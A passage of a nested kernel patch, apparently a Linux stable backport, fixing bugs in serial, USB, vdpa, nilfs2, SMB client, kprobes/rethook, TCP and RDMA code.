+-	sgbuf = dmarx->use_buf_b ? &uap->dmarx.sgbuf_b : &uap->dmarx.sgbuf_a;
++	dbuf = dmarx->use_buf_b ? &uap->dmarx.dbuf_b : &uap->dmarx.dbuf_a;
+ 	rxchan->device->device_tx_status(rxchan, dmarx->cookie, &state);
+ 	if (likely(state.residue < dmarx->last_residue)) {
+-		dmataken = sgbuf->sg.length - dmarx->last_residue;
++		dmataken = dbuf->len - dmarx->last_residue;
+ 		size = dmarx->last_residue - state.residue;
+-		dma_count = tty_insert_flip_string(port, sgbuf->buf + dmataken,
++		dma_count = tty_insert_flip_string(port, dbuf->buf + dmataken,
+ 				size);
+ 		if (dma_count == size)
+ 			dmarx->last_residue =  state.residue;
+@@ -1123,7 +1118,7 @@ static void pl011_dma_startup(struct uart_amba_port *uap)
+ 		return;
+ 	}
+ 
+-	sg_init_one(&uap->dmatx.sg, uap->dmatx.buf, PL011_DMA_BUFFER_SIZE);
++	uap->dmatx.len = PL011_DMA_BUFFER_SIZE;
+ 
+ 	/* The DMA buffer is now the FIFO the TTY subsystem can use */
+ 	uap->port.fifosize = PL011_DMA_BUFFER_SIZE;
+@@ -1133,7 +1128,7 @@ static void pl011_dma_startup(struct uart_amba_port *uap)
+ 		goto skip_rx;
+ 
+ 	/* Allocate and map DMA RX buffers */
+-	ret = pl011_sgbuf_init(uap->dmarx.chan, &uap->dmarx.sgbuf_a,
++	ret = pl011_dmabuf_init(uap->dmarx.chan, &uap->dmarx.dbuf_a,
+ 			       DMA_FROM_DEVICE);
+ 	if (ret) {
+ 		dev_err(uap->port.dev, "failed to init DMA %s: %d\n",
+@@ -1141,12 +1136,12 @@ static void pl011_dma_startup(struct uart_amba_port *uap)
+ 		goto skip_rx;
+ 	}
+ 
+-	ret = pl011_sgbuf_init(uap->dmarx.chan, &uap->dmarx.sgbuf_b,
++	ret = pl011_dmabuf_init(uap->dmarx.chan, &uap->dmarx.dbuf_b,
+ 			       DMA_FROM_DEVICE);
+ 	if (ret) {
+ 		dev_err(uap->port.dev, "failed to init DMA %s: %d\n",
+ 			"RX buffer B", ret);
+-		pl011_sgbuf_free(uap->dmarx.chan, &uap->dmarx.sgbuf_a,
++		pl011_dmabuf_free(uap->dmarx.chan, &uap->dmarx.dbuf_a,
+ 				 DMA_FROM_DEVICE);
+ 		goto skip_rx;
+ 	}
+@@ -1200,8 +1195,9 @@ static void pl011_dma_shutdown(struct uart_amba_port *uap)
+ 		/* In theory, this should already be done by pl011_dma_flush_buffer */
+ 		dmaengine_terminate_all(uap->dmatx.chan);
+ 		if (uap->dmatx.queued) {
+-			dma_unmap_sg(uap->dmatx.chan->device->dev, &uap->dmatx.sg, 1,
+-				     DMA_TO_DEVICE);
++			dma_unmap_single(uap->dmatx.chan->device->dev,
++					 uap->dmatx.dma, uap->dmatx.len,
++					 DMA_TO_DEVICE);
+ 			uap->dmatx.queued = false;
+ 		}
+ 
+@@ -1212,8 +1208,8 @@ static void pl011_dma_shutdown(struct uart_amba_port *uap)
+ 	if (uap->using_rx_dma) {
+ 		dmaengine_terminate_all(uap->dmarx.chan);
+ 		/* Clean up the RX DMA */
+-		pl011_sgbuf_free(uap->dmarx.chan, &uap->dmarx.sgbuf_a, DMA_FROM_DEVICE);
+-		pl011_sgbuf_free(uap->dmarx.chan, &uap->dmarx.sgbuf_b, DMA_FROM_DEVICE);
++		pl011_dmabuf_free(uap->dmarx.chan, &uap->dmarx.dbuf_a, DMA_FROM_DEVICE);
++		pl011_dmabuf_free(uap->dmarx.chan, &uap->dmarx.dbuf_b, DMA_FROM_DEVICE);
+ 		if (uap->dmarx.poll_rate)
+ 			del_timer_sync(&uap->dmarx.timer);
+ 		uap->using_rx_dma = false;
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index b398fba942964..b4b849415c503 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -769,6 +769,18 @@ static bool sc16is7xx_port_irq(struct sc16is7xx_port *s, int portno)
+ 		case SC16IS7XX_IIR_RTOI_SRC:
+ 		case SC16IS7XX_IIR_XOFFI_SRC:
+ 			rxlen = sc16is7xx_port_read(port, SC16IS7XX_RXLVL_REG);
++
++			/*
++			 * There is a silicon bug that makes the chip report a
++			 * time-out interrupt but no data in the FIFO. This is
++			 * described in errata section 18.1.4.
++			 *
++			 * When this happens, read one byte from the FIFO to
++			 * clear the interrupt.
++			 */
++			if (iir == SC16IS7XX_IIR_RTOI_SRC && !rxlen)
++				rxlen = 1;
++
+ 			if (rxlen)
+ 				sc16is7xx_handle_rx(port, rxlen, iir);
+ 			break;
+diff --git a/drivers/usb/gadget/function/f_hid.c b/drivers/usb/gadget/function/f_hid.c
+index 6be6009f911e1..f1ca9250cad96 100644
+--- a/drivers/usb/gadget/function/f_hid.c
++++ b/drivers/usb/gadget/function/f_hid.c
+@@ -88,6 +88,7 @@ static void hidg_release(struct device *dev)
+ {
+ 	struct f_hidg *hidg = container_of(dev, struct f_hidg, dev);
+ 
++	kfree(hidg->report_desc);
+ 	kfree(hidg->set_report_buf);
+ 	kfree(hidg);
+ }
+@@ -1287,9 +1288,9 @@ static struct usb_function *hidg_alloc(struct usb_function_instance *fi)
+ 	hidg->report_length = opts->report_length;
+ 	hidg->report_desc_length = opts->report_desc_length;
+ 	if (opts->report_desc) {
+-		hidg->report_desc = devm_kmemdup(&hidg->dev, opts->report_desc,
+-						 opts->report_desc_length,
+-						 GFP_KERNEL);
++		hidg->report_desc = kmemdup(opts->report_desc,
++					    opts->report_desc_length,
++					    GFP_KERNEL);
+ 		if (!hidg->report_desc) {
+ 			put_device(&hidg->dev);
+ 			--opts->refcnt;
+diff --git a/drivers/usb/gadget/udc/core.c b/drivers/usb/gadget/udc/core.c
+index 1c0c61e8ba696..c40f2ecbe1b8c 100644
+--- a/drivers/usb/gadget/udc/core.c
++++ b/drivers/usb/gadget/udc/core.c
+@@ -1608,8 +1608,6 @@ static void gadget_unbind_driver(struct device *dev)
+ 
+ 	dev_dbg(&udc->dev, "unbinding gadget driver [%s]\n", driver->function);
+ 
+-	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+-
+ 	udc->allow_connect = false;
+ 	cancel_work_sync(&udc->vbus_work);
+ 	mutex_lock(&udc->connect_lock);
+@@ -1629,6 +1627,8 @@ static void gadget_unbind_driver(struct device *dev)
+ 	driver->is_bound = false;
+ 	udc->driver = NULL;
+ 	mutex_unlock(&udc_lock);
++
++	kobject_uevent(&udc->dev.kobj, KOBJ_CHANGE);
+ }
+ 
+ /* ------------------------------------------------------------------------- */
+diff --git a/drivers/usb/host/xhci-pci.c b/drivers/usb/host/xhci-pci.c
+index 24bcf6ab12d8a..e02ef31da68e4 100644
+--- a/drivers/usb/host/xhci-pci.c
++++ b/drivers/usb/host/xhci-pci.c
+@@ -348,8 +348,6 @@ static void xhci_pci_quirks(struct device *dev, struct xhci_hcd *xhci)
+ 	/* xHC spec requires PCI devices to support D3hot and D3cold */
+ 	if (xhci->hci_version >= 0x120)
+ 		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+-	else if (pdev->vendor == PCI_VENDOR_ID_AMD && xhci->hci_version >= 0x110)
+-		xhci->quirks |= XHCI_DEFAULT_PM_RUNTIME_ALLOW;
+ 
+ 	if (xhci->quirks & XHCI_RESET_ON_RESUME)
+ 		xhci_dbg_trace(xhci, trace_xhci_dbg_quirks,
+diff --git a/drivers/usb/typec/class.c b/drivers/usb/typec/class.c
+index 3c3bab33e03a5..49d6b2388b874 100644
+--- a/drivers/usb/typec/class.c
++++ b/drivers/usb/typec/class.c
+@@ -267,7 +267,7 @@ static void typec_altmode_put_partner(struct altmode *altmode)
+ 	if (!partner)
+ 		return;
+ 
+-	adev = &partner->adev;
++	adev = &altmode->adev;
+ 
+ 	if (is_typec_plug(adev->dev.parent)) {
+ 		struct typec_plug *plug = to_typec_plug(adev->dev.parent);
+@@ -497,7 +497,8 @@ static void typec_altmode_release(struct device *dev)
+ {
+ 	struct altmode *alt = to_altmode(to_typec_altmode(dev));
+ 
+-	typec_altmode_put_partner(alt);
++	if (!is_typec_port(dev->parent))
++		typec_altmode_put_partner(alt);
+ 
+ 	altmode_id_remove(alt->adev.dev.parent, alt->id);
+ 	kfree(alt);
+diff --git a/drivers/vdpa/mlx5/net/mlx5_vnet.c b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+index bf99654371b35..2b7e796c48897 100644
+--- a/drivers/vdpa/mlx5/net/mlx5_vnet.c
++++ b/drivers/vdpa/mlx5/net/mlx5_vnet.c
+@@ -2508,13 +2508,18 @@ static int setup_cvq_vring(struct mlx5_vdpa_dev *mvdev)
+ 	struct mlx5_control_vq *cvq = &mvdev->cvq;
+ 	int err = 0;
+ 
+-	if (mvdev->actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VQ))
++	if (mvdev->actual_features & BIT_ULL(VIRTIO_NET_F_CTRL_VQ)) {
++		u16 idx = cvq->vring.last_avail_idx;
++
+ 		err = vringh_init_iotlb(&cvq->vring, mvdev->actual_features,
+ 					MLX5_CVQ_MAX_ENT, false,
+ 					(struct vring_desc *)(uintptr_t)cvq->desc_addr,
+ 					(struct vring_avail *)(uintptr_t)cvq->driver_addr,
+ 					(struct vring_used *)(uintptr_t)cvq->device_addr);
+ 
++		if (!err)
++			cvq->vring.last_avail_idx = cvq->vring.last_used_idx = idx;
++	}
+ 	return err;
+ }
+ 
+diff --git a/fs/nilfs2/sufile.c b/fs/nilfs2/sufile.c
+index 2c6078a6b8ecb..58ca7c936393c 100644
+--- a/fs/nilfs2/sufile.c
++++ b/fs/nilfs2/sufile.c
+@@ -501,15 +501,38 @@ int nilfs_sufile_mark_dirty(struct inode *sufile, __u64 segnum)
+ 
+ 	down_write(&NILFS_MDT(sufile)->mi_sem);
+ 	ret = nilfs_sufile_get_segment_usage_block(sufile, segnum, 0, &bh);
+-	if (!ret) {
+-		mark_buffer_dirty(bh);
+-		nilfs_mdt_mark_dirty(sufile);
+-		kaddr = kmap_atomic(bh->b_page);
+-		su = nilfs_sufile_block_get_segment_usage(sufile, segnum, bh, kaddr);
++	if (ret)
++		goto out_sem;
++
++	kaddr = kmap_atomic(bh->b_page);
++	su = nilfs_sufile_block_get_segment_usage(sufile, segnum, bh, kaddr);
++	if (unlikely(nilfs_segment_usage_error(su))) {
++		struct the_nilfs *nilfs = sufile->i_sb->s_fs_info;
++
++		kunmap_atomic(kaddr);
++		brelse(bh);
++		if (nilfs_segment_is_active(nilfs, segnum)) {
++			nilfs_error(sufile->i_sb,
++				    "active segment %llu is erroneous",
++				    (unsigned long long)segnum);
++		} else {
++			/*
++			 * Segments marked erroneous are never allocated by
++			 * nilfs_sufile_alloc(); only active segments, ie,
++			 * the segments indexed by ns_segnum or ns_nextnum,
++			 * can be erroneous here.
++			 */
++			WARN_ON_ONCE(1);
++		}
++		ret = -EIO;
++	} else {
+ 		nilfs_segment_usage_set_dirty(su);
+ 		kunmap_atomic(kaddr);
++		mark_buffer_dirty(bh);
++		nilfs_mdt_mark_dirty(sufile);
+ 		brelse(bh);
+ 	}
++out_sem:
+ 	up_write(&NILFS_MDT(sufile)->mi_sem);
+ 	return ret;
+ }
+@@ -536,9 +559,14 @@ int nilfs_sufile_set_segment_usage(struct inode *sufile, __u64 segnum,
+ 
+ 	kaddr = kmap_atomic(bh->b_page);
+ 	su = nilfs_sufile_block_get_segment_usage(sufile, segnum, bh, kaddr);
+-	WARN_ON(nilfs_segment_usage_error(su));
+-	if (modtime)
++	if (modtime) {
++		/*
++		 * Check segusage error and set su_lastmod only when updating
++		 * this entry with a valid timestamp, not for cancellation.
++		 */
++		WARN_ON_ONCE(nilfs_segment_usage_error(su));
+ 		su->su_lastmod = cpu_to_le64(modtime);
++	}
+ 	su->su_nblocks = cpu_to_le32(nblocks);
+ 	kunmap_atomic(kaddr);
+ 
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 0f0667957c810..71400496ed365 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -716,7 +716,11 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 			goto failed_sbh;
+ 		}
+ 		nilfs_release_super_block(nilfs);
+-		sb_set_blocksize(sb, blocksize);
++		if (!sb_set_blocksize(sb, blocksize)) {
++			nilfs_err(sb, "bad blocksize %d", blocksize);
++			err = -EINVAL;
++			goto out;
++		}
+ 
+ 		err = nilfs_load_super_block(nilfs, sb, blocksize, &sbp);
+ 		if (err)
+diff --git a/fs/smb/client/cifsfs.c b/fs/smb/client/cifsfs.c
+index 33ea1440f4b06..2e15b182e59fc 100644
+--- a/fs/smb/client/cifsfs.c
++++ b/fs/smb/client/cifsfs.c
+@@ -1191,32 +1191,103 @@ const struct inode_operations cifs_symlink_inode_ops = {
+ 	.listxattr = cifs_listxattr,
+ };
+ 
++/*
++ * Advance the EOF marker to after the source range.
++ */
++static int cifs_precopy_set_eof(struct inode *src_inode, struct cifsInodeInfo *src_cifsi,
++				struct cifs_tcon *src_tcon,
++				unsigned int xid, loff_t src_end)
++{
++	struct cifsFileInfo *writeable_srcfile;
++	int rc = -EINVAL;
++
++	writeable_srcfile = find_writable_file(src_cifsi, FIND_WR_FSUID_ONLY);
++	if (writeable_srcfile) {
++		if (src_tcon->ses->server->ops->set_file_size)
++			rc = src_tcon->ses->server->ops->set_file_size(
++				xid, src_tcon, writeable_srcfile,
++				src_inode->i_size, true /* no need to set sparse */);
++		else
++			rc = -ENOSYS;
++		cifsFileInfo_put(writeable_srcfile);
++		cifs_dbg(FYI, "SetFSize for copychunk rc = %d\n", rc);
++	}
++
++	if (rc < 0)
++		goto set_failed;
++
++	netfs_resize_file(&src_cifsi->netfs, src_end);
++	fscache_resize_cookie(cifs_inode_cookie(src_inode), src_end);
++	return 0;
++
++set_failed:
++	return filemap_write_and_wait(src_inode->i_mapping);
++}
++
++/*
++ * Flush out either the folio that overlaps the beginning of a range in which
++ * pos resides or the folio that overlaps the end of a range unless that folio
++ * is entirely within the range we're going to invalidate.  We extend the flush
++ * bounds to encompass the folio.
++ */
++static int cifs_flush_folio(struct inode *inode, loff_t pos, loff_t *_fstart, loff_t *_fend,
++			    bool first)
++{
++	struct folio *folio;
++	unsigned long long fpos, fend;
++	pgoff_t index = pos / PAGE_SIZE;
++	size_t size;
++	int rc = 0;
++
++	folio = filemap_get_folio(inode->i_mapping, index);
++	if (IS_ERR(folio))
++		return 0;
++
++	size = folio_size(folio);
++	fpos = folio_pos(folio);
++	fend = fpos + size - 1;
++	*_fstart = min_t(unsigned long long, *_fstart, fpos);
++	*_fend   = max_t(unsigned long long, *_fend, fend);
++	if ((first && pos == fpos) || (!first && pos == fend))
++		goto out;
++
++	rc = filemap_write_and_wait_range(inode->i_mapping, fpos, fend);
++out:
++	folio_put(folio);
++	return rc;
++}
++
+ static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
+ 		struct file *dst_file, loff_t destoff, loff_t len,
+ 		unsigned int remap_flags)
+ {
+ 	struct inode *src_inode = file_inode(src_file);
+ 	struct inode *target_inode = file_inode(dst_file);
++	struct cifsInodeInfo *src_cifsi = CIFS_I(src_inode);
++	struct cifsInodeInfo *target_cifsi = CIFS_I(target_inode);
+ 	struct cifsFileInfo *smb_file_src = src_file->private_data;
+-	struct cifsFileInfo *smb_file_target;
+-	struct cifs_tcon *target_tcon;
++	struct cifsFileInfo *smb_file_target = dst_file->private_data;
++	struct cifs_tcon *target_tcon, *src_tcon;
++	unsigned long long destend, fstart, fend, new_size;
+ 	unsigned int xid;
+ 	int rc;
+ 
+-	if (remap_flags & ~(REMAP_FILE_DEDUP | REMAP_FILE_ADVISORY))
++	if (remap_flags & REMAP_FILE_DEDUP)
++		return -EOPNOTSUPP;
++	if (remap_flags & ~REMAP_FILE_ADVISORY)
+ 		return -EINVAL;
+ 
+ 	cifs_dbg(FYI, "clone range\n");
+ 
+ 	xid = get_xid();
+ 
+-	if (!src_file->private_data || !dst_file->private_data) {
++	if (!smb_file_src || !smb_file_target) {
+ 		rc = -EBADF;
+ 		cifs_dbg(VFS, "missing cifsFileInfo on copy range src file\n");
+ 		goto out;
+ 	}
+ 
+-	smb_file_target = dst_file->private_data;
++	src_tcon = tlink_tcon(smb_file_src->tlink);
+ 	target_tcon = tlink_tcon(smb_file_target->tlink);
+ 
+ 	/*
+@@ -1229,20 +1300,63 @@ static loff_t cifs_remap_file_range(struct file *src_file, loff_t off,
+ 	if (len == 0)
+ 		len = src_inode->i_size - off;
+ 
+-	cifs_dbg(FYI, "about to flush pages\n");
+-	/* should we flush first and last page first */
+-	truncate_inode_pages_range(&target_inode->i_data, destoff,
+-				   PAGE_ALIGN(destoff + len)-1);
++	cifs_dbg(FYI, "clone range\n");
+ 
+-	if (target_tcon->ses->server->ops->duplicate_extents)
++	/* Flush the source buffer */
++	rc = filemap_write_and_wait_range(src_inode->i_mapping, off,
++					  off + len - 1);
++	if (rc)
++		goto unlock;
++
++	/* The server-side copy will fail if the source crosses the EOF marker.
++	 * Advance the EOF marker after the flush above to the end of the range
++	 * if it's short of that.
++	 */
++	if (src_cifsi->netfs.remote_i_size < off + len) {
++		rc = cifs_precopy_set_eof(src_inode, src_cifsi, src_tcon, xid, off + len);
++		if (rc < 0)
++			goto unlock;
++	}
++
++	new_size = destoff + len;
++	destend = destoff + len - 1;
++
++	/* Flush the folios at either end of the destination range to prevent
++	 * accidental loss of dirty data outside of the range.
++	 */
++	fstart = destoff;
++	fend = destend;
++
++	rc = cifs_flush_folio(target_inode, destoff, &fstart, &fend, true);
++	if (rc)
++		goto unlock;
++	rc = cifs_flush_folio(target_inode, destend, &fstart, &fend, false);
++	if (rc)
++		goto unlock;
++
++	/* Discard all the folios that overlap the destination region. */
++	cifs_dbg(FYI, "about to discard pages %llx-%llx\n", fstart, fend);
++	truncate_inode_pages_range(&target_inode->i_data, fstart, fend);
++
++	fscache_invalidate(cifs_inode_cookie(target_inode), NULL,
++			   i_size_read(target_inode), 0);
++
++	rc = -EOPNOTSUPP;
++	if (target_tcon->ses->server->ops->duplicate_extents) {
+ 		rc = target_tcon->ses->server->ops->duplicate_extents(xid,
+ 			smb_file_src, smb_file_target, off, len, destoff);
+-	else
+-		rc = -EOPNOTSUPP;
++		if (rc == 0 && new_size > i_size_read(target_inode)) {
++			truncate_setsize(target_inode, new_size);
++			netfs_resize_file(&target_cifsi->netfs, new_size);
++			fscache_resize_cookie(cifs_inode_cookie(target_inode),
++					      new_size);
++		}
++	}
+ 
+ 	/* force revalidate of size and timestamps of target file now
+ 	   that target is updated on the server */
+ 	CIFS_I(target_inode)->time = 0;
++unlock:
+ 	/* although unlocking in the reverse order from locking is not
+ 	   strictly necessary here it is a little cleaner to be consistent */
+ 	unlock_two_nondirectories(src_inode, target_inode);
+@@ -1258,10 +1372,12 @@ ssize_t cifs_file_copychunk_range(unsigned int xid,
+ {
+ 	struct inode *src_inode = file_inode(src_file);
+ 	struct inode *target_inode = file_inode(dst_file);
++	struct cifsInodeInfo *src_cifsi = CIFS_I(src_inode);
+ 	struct cifsFileInfo *smb_file_src;
+ 	struct cifsFileInfo *smb_file_target;
+ 	struct cifs_tcon *src_tcon;
+ 	struct cifs_tcon *target_tcon;
++	unsigned long long destend, fstart, fend;
+ 	ssize_t rc;
+ 
+ 	cifs_dbg(FYI, "copychunk range\n");
+@@ -1301,13 +1417,41 @@ ssize_t cifs_file_copychunk_range(unsigned int xid,
+ 	if (rc)
+ 		goto unlock;
+ 
+-	/* should we flush first and last page first */
+-	truncate_inode_pages(&target_inode->i_data, 0);
++	/* The server-side copy will fail if the source crosses the EOF marker.
++	 * Advance the EOF marker after the flush above to the end of the range
++	 * if it's short of that.
++	 */
++	if (src_cifsi->server_eof < off + len) {
++		rc = cifs_precopy_set_eof(src_inode, src_cifsi, src_tcon, xid, off + len);
++		if (rc < 0)
++			goto unlock;
++	}
++
++	destend = destoff + len - 1;
++
++	/* Flush the folios at either end of the destination range to prevent
++	 * accidental loss of dirty data outside of the range.
++	 */
++	fstart = destoff;
++	fend = destend;
++
++	rc = cifs_flush_folio(target_inode, destoff, &fstart, &fend, true);
++	if (rc)
++		goto unlock;
++	rc = cifs_flush_folio(target_inode, destend, &fstart, &fend, false);
++	if (rc)
++		goto unlock;
++
++	/* Discard all the folios that overlap the destination region. */
++	truncate_inode_pages_range(&target_inode->i_data, fstart, fend);
+ 
+ 	rc = file_modified(dst_file);
+-	if (!rc)
++	if (!rc) {
+ 		rc = target_tcon->ses->server->ops->copychunk_range(xid,
+ 			smb_file_src, smb_file_target, off, len, destoff);
++		if (rc > 0 && destoff + rc > i_size_read(target_inode))
++			truncate_setsize(target_inode, destoff + rc);
++	}
+ 
+ 	file_accessed(src_file);
+ 
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index e628848a1df93..6ef3c00de5ca1 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -2834,6 +2834,8 @@ smb2_get_dfs_refer(const unsigned int xid, struct cifs_ses *ses,
+ 		usleep_range(512, 2048);
+ 	} while (++retry_count < 5);
+ 
++	if (!rc && !dfs_rsp)
++		rc = -EIO;
+ 	if (rc) {
+ 		if (!is_retryable_error(rc) && rc != -ENOENT && rc != -EOPNOTSUPP)
+ 			cifs_tcon_dbg(VFS, "%s: ioctl error: rc=%d\n", __func__, rc);
+diff --git a/include/linux/cpuhotplug.h b/include/linux/cpuhotplug.h
+index c7e0d80dbf6a5..67575bc8a7e29 100644
+--- a/include/linux/cpuhotplug.h
++++ b/include/linux/cpuhotplug.h
+@@ -196,6 +196,7 @@ enum cpuhp_state {
+ 	CPUHP_AP_ARM_CORESIGHT_CTI_STARTING,
+ 	CPUHP_AP_ARM64_ISNDEP_STARTING,
+ 	CPUHP_AP_SMPCFD_DYING,
++	CPUHP_AP_HRTIMERS_DYING,
+ 	CPUHP_AP_X86_TBOOT_DYING,
+ 	CPUHP_AP_ARM_CACHE_B15_RAC_DYING,
+ 	CPUHP_AP_ONLINE,
+diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
+index 0ee140176f102..f2044d5a652b5 100644
+--- a/include/linux/hrtimer.h
++++ b/include/linux/hrtimer.h
+@@ -531,9 +531,9 @@ extern void sysrq_timer_list_show(void);
+ 
+ int hrtimers_prepare_cpu(unsigned int cpu);
+ #ifdef CONFIG_HOTPLUG_CPU
+-int hrtimers_dead_cpu(unsigned int cpu);
++int hrtimers_cpu_dying(unsigned int cpu);
+ #else
+-#define hrtimers_dead_cpu	NULL
++#define hrtimers_cpu_dying	NULL
+ #endif
+ 
+ #endif
+diff --git a/include/linux/hugetlb.h b/include/linux/hugetlb.h
+index e46f6b49eb389..1c6f35ba1604f 100644
+--- a/include/linux/hugetlb.h
++++ b/include/linux/hugetlb.h
+@@ -880,10 +880,7 @@ static inline bool hugepage_migration_supported(struct hstate *h)
+ 	return arch_hugetlb_migration_supported(h);
+ }
+ 
+-static inline bool __vma_private_lock(struct vm_area_struct *vma)
+-{
+-	return (!(vma->vm_flags & VM_MAYSHARE)) && vma->vm_private_data;
+-}
++bool __vma_private_lock(struct vm_area_struct *vma);
+ 
+ /*
+  * Movability check is different as compared to migration check.
+diff --git a/include/linux/iommu.h b/include/linux/iommu.h
+index 3c9da1f8979e3..9d87090953bcc 100644
+--- a/include/linux/iommu.h
++++ b/include/linux/iommu.h
+@@ -657,6 +657,7 @@ static inline void dev_iommu_priv_set(struct device *dev, void *priv)
+ 	dev->iommu->priv = priv;
+ }
+ 
++extern struct mutex iommu_probe_device_lock;
+ int iommu_probe_device(struct device *dev);
+ void iommu_release_device(struct device *dev);
+ 
+diff --git a/include/linux/kprobes.h b/include/linux/kprobes.h
+index 85a64cb95d755..8de5d51a0b5e7 100644
+--- a/include/linux/kprobes.h
++++ b/include/linux/kprobes.h
+@@ -140,7 +140,7 @@ static inline bool kprobe_ftrace(struct kprobe *p)
+  *
+  */
+ struct kretprobe_holder {
+-	struct kretprobe	*rp;
++	struct kretprobe __rcu *rp;
+ 	refcount_t		ref;
+ };
+ 
+@@ -202,10 +202,8 @@ extern int arch_trampoline_kprobe(struct kprobe *p);
+ #ifdef CONFIG_KRETPROBE_ON_RETHOOK
+ static nokprobe_inline struct kretprobe *get_kretprobe(struct kretprobe_instance *ri)
+ {
+-	RCU_LOCKDEP_WARN(!rcu_read_lock_any_held(),
+-		"Kretprobe is accessed from instance under preemptive context");
+-
+-	return (struct kretprobe *)READ_ONCE(ri->node.rethook->data);
++	/* rethook::data is non-changed field, so that you can access it freely. */
++	return (struct kretprobe *)ri->node.rethook->data;
+ }
+ static nokprobe_inline unsigned long get_kretprobe_retaddr(struct kretprobe_instance *ri)
+ {
+@@ -250,10 +248,7 @@ unsigned long kretprobe_trampoline_handler(struct pt_regs *regs,
+ 
+ static nokprobe_inline struct kretprobe *get_kretprobe(struct kretprobe_instance *ri)
+ {
+-	RCU_LOCKDEP_WARN(!rcu_read_lock_any_held(),
+-		"Kretprobe is accessed from instance under preemptive context");
+-
+-	return READ_ONCE(ri->rph->rp);
++	return rcu_dereference_check(ri->rph->rp, rcu_read_lock_any_held());
+ }
+ 
+ static nokprobe_inline unsigned long get_kretprobe_retaddr(struct kretprobe_instance *ri)
+diff --git a/include/linux/rethook.h b/include/linux/rethook.h
+index bdbe6717f45a2..a00963f33bc14 100644
+--- a/include/linux/rethook.h
++++ b/include/linux/rethook.h
+@@ -29,7 +29,12 @@ typedef void (*rethook_handler_t) (struct rethook_node *, void *, struct pt_regs
+  */
+ struct rethook {
+ 	void			*data;
+-	rethook_handler_t	handler;
++	/*
++	 * To avoid sparse warnings, this uses a raw function pointer with
++	 * __rcu, instead of rethook_handler_t. But this must be same as
++	 * rethook_handler_t.
++	 */
++	void (__rcu *handler) (struct rethook_node *, void *, struct pt_regs *);
+ 	struct freelist_head	pool;
+ 	refcount_t		ref;
+ 	struct rcu_head		rcu;
+diff --git a/include/linux/stmmac.h b/include/linux/stmmac.h
+index d82ff9fa1a6e8..9f4a4f70270df 100644
+--- a/include/linux/stmmac.h
++++ b/include/linux/stmmac.h
+@@ -172,6 +172,7 @@ struct stmmac_fpe_cfg {
+ 	bool hs_enable;				/* FPE handshake enable */
+ 	enum stmmac_fpe_state lp_fpe_state;	/* Link Partner FPE state */
+ 	enum stmmac_fpe_state lo_fpe_state;	/* Local station FPE state */
++	u32 fpe_csr;				/* MAC_FPE_CTRL_STS reg cache */
+ };
+ 
+ struct stmmac_safety_feature_cfg {
+diff --git a/include/net/genetlink.h b/include/net/genetlink.h
+index 9f97f73615b69..b9e5a22ae3ff9 100644
+--- a/include/net/genetlink.h
++++ b/include/net/genetlink.h
+@@ -12,10 +12,12 @@
+  * struct genl_multicast_group - generic netlink multicast group
+  * @name: name of the multicast group, names are per-family
+  * @flags: GENL_* flags (%GENL_ADMIN_PERM or %GENL_UNS_ADMIN_PERM)
++ * @cap_sys_admin: whether %CAP_SYS_ADMIN is required for binding
+  */
+ struct genl_multicast_group {
+ 	char			name[GENL_NAMSIZ];
+ 	u8			flags;
++	u8			cap_sys_admin:1;
+ };
+ 
+ struct genl_ops;
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 19646fdec23dc..c3d56b337f358 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -1460,17 +1460,22 @@ static inline int tcp_full_space(const struct sock *sk)
+ 	return tcp_win_from_space(sk, READ_ONCE(sk->sk_rcvbuf));
+ }
+ 
+-static inline void tcp_adjust_rcv_ssthresh(struct sock *sk)
++static inline void __tcp_adjust_rcv_ssthresh(struct sock *sk, u32 new_ssthresh)
+ {
+ 	int unused_mem = sk_unused_reserved_mem(sk);
+ 	struct tcp_sock *tp = tcp_sk(sk);
+ 
+-	tp->rcv_ssthresh = min(tp->rcv_ssthresh, 4U * tp->advmss);
++	tp->rcv_ssthresh = min(tp->rcv_ssthresh, new_ssthresh);
+ 	if (unused_mem)
+ 		tp->rcv_ssthresh = max_t(u32, tp->rcv_ssthresh,
+ 					 tcp_win_from_space(sk, unused_mem));
+ }
+ 
++static inline void tcp_adjust_rcv_ssthresh(struct sock *sk)
++{
++	__tcp_adjust_rcv_ssthresh(sk, 4U * tcp_sk(sk)->advmss);
++}
++
+ void tcp_cleanup_rbuf(struct sock *sk, int copied);
+ void __tcp_cleanup_rbuf(struct sock *sk, int copied);
+ 
+diff --git a/include/rdma/ib_umem.h b/include/rdma/ib_umem.h
+index 92a673cd9b4fd..77b83ea62dd69 100644
+--- a/include/rdma/ib_umem.h
++++ b/include/rdma/ib_umem.h
+@@ -78,6 +78,13 @@ static inline void __rdma_umem_block_iter_start(struct ib_block_iter *biter,
+ {
+ 	__rdma_block_iter_start(biter, umem->sgt_append.sgt.sgl,
+ 				umem->sgt_append.sgt.nents, pgsz);
++	biter->__sg_advance = ib_umem_offset(umem) & ~(pgsz - 1);
++	biter->__sg_numblocks = ib_umem_num_dma_blocks(umem, pgsz);
++}
++
++static inline bool __rdma_umem_block_iter_next(struct ib_block_iter *biter)
++{
++	return __rdma_block_iter_next(biter) && biter->__sg_numblocks--;
+ }
+ 
+ /**
+@@ -93,7 +100,7 @@ static inline void __rdma_umem_block_iter_start(struct ib_block_iter *biter,
+  */
+ #define rdma_umem_for_each_dma_block(umem, biter, pgsz)                        \
+ 	for (__rdma_umem_block_iter_start(biter, umem, pgsz);                  \
+-	     __rdma_block_iter_next(biter);)
++	     __rdma_umem_block_iter_next(biter);)
+ 
